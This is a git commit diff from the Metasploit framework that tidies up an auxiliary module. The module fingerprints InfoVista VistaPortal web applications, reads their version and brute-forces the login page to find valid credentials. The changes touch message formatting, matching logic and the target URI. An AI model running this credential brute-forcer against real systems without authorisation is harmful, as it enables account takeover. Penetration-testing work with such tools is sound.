Do final cleanup for infovista_enum

Author: jvazquez-r7

modules/auxiliary/scanner/http/infovista_enum.rb

@@ -15,19 +15,12 @@ class Metasploit3 < Msf::Auxiliary
 	include Msf::Auxiliary::AuthBrute
 	include Msf::Auxiliary::Scanner
 
-	#
-	# CONSTANTS
-	# Used to check if remote app is InfoVista
-	#
-
-	INFOVISTA_FINGERPRINT = 'InfoVista® VistaPortal®'
-
 	def initialize(info={})
 		super(update_info(info,
 			'Name'           => 'InfoVista VistaPortal Application Brute Force Login Utility',
 			'Description'    => %{
-				This module attempts to scan for InfoVista VistaPortal Web Application, finds its version
-			and performs login brute force to identify valid credentials.
+				This module attempts to scan for InfoVista VistaPortal Web Application, finds its
+			version and performs login brute force to identify valid credentials.
 			},
 			'Author'         =>
 				[
@@ -46,14 +39,14 @@ def initialize(info={})
 
 	def run_host(ip)
 		unless is_app_infovista?
-			print_error("#{rhost}:#{rport} -> Application does not appear to be InfoVista VistaPortal. Module will not continue.")
+			print_error("#{rhost}:#{rport} - Application does not appear to be InfoVista VistaPortal. Module will not continue.")
 			return
 		end
 
 		status = try_default_credential
 		return if status == :abort
 
-		print_status("#{rhost}:#{rport} -> Brute-forcing...")
+		print_status("#{rhost}:#{rport} - Brute-forcing...")
 		each_user_pass do |user, pass|
 			do_login(user, pass)
 		end
@@ -70,10 +63,10 @@ def is_app_infovista?
 				'method'    => 'GET'
 			})
 
-			if (res and res.code == 200 and res.body.include?(INFOVISTA_FINGERPRINT))
+			if (res and res.code == 200 and res.body =~ /InfoVista.*VistaPortal/)
 				version_key = /PORTAL_VERSION = (.+)./
 				version = res.body.scan(version_key).flatten[0].gsub('"','')
-				print_good("#{rhost}:#{rport} -> Application version is #{version}")
+				print_good("#{rhost}:#{rport} - Application version is #{version}")
 				return true
 			else
 				return false
@@ -93,11 +86,11 @@ def try_default_credential
 	# Brute-force the login page
 	#
 	def do_login(user, pass)
-		vprint_status("#{rhost}:#{rport} -> Trying username:#{user.inspect} with password:#{pass.inspect}")
+		vprint_status("#{rhost}:#{rport} - Trying username:#{user.inspect} with password:#{pass.inspect}")
 		begin
 			res = send_request_cgi(
 			{
-				'uri'       => '/VPortal/mgtconsole/CheckPassword.jsp',
+				'uri'       => target_uri.to_s,
 				'method'    => 'POST',
 				'vars_post' =>
 					{
@@ -106,13 +99,10 @@ def do_login(user, pass)
 					}
 			})
 
-			get_response = "<script type=\"text/javascript\">\r\nlocation.href = 'AdminFrame.jsp';\r\n</script>\r\n"
-
-			if (not res or res.code != 200 and res.body != "#{get_response}")
-				vprint_error("#{rhost}:#{rport} -> FAILED LOGIN - #{user.inspect}:#{pass.inspect} with code #{res.code}")
-				return :skip_pass
+			if (not res or res.code != 200 or res.body !~ /location.href.*AdminFrame\.jsp/)
+				vprint_error("#{rhost}:#{rport} - FAILED LOGIN - #{user.inspect}:#{pass.inspect} with code #{res.code}")
 			else
-				print_good("#{rhost}:#{rport} -> SUCCESSFUL LOGIN - #{user.inspect}:#{pass.inspect}")
+				print_good("#{rhost}:#{rport} - SUCCESSFUL LOGIN - #{user.inspect}:#{pass.inspect}")
 
 				report_hash = {
 					:host   => rhost,
@@ -121,14 +111,15 @@ def do_login(user, pass)
 					:user   => user,
 					:pass   => pass,
 					:active => true,
-					:type => 'password'}
+					:type => 'password'
+				}
 
 				report_auth_info(report_hash)
 				return :next_user
 			end
 
 		rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError, ::Errno::EPIPE
-			print_error("#{rhost}:#{rport} -> HTTP Connection Failed, Aborting")
+			print_error("#{rhost}:#{rport} - HTTP Connection Failed, Aborting")
 			return :abort
 		end
 	end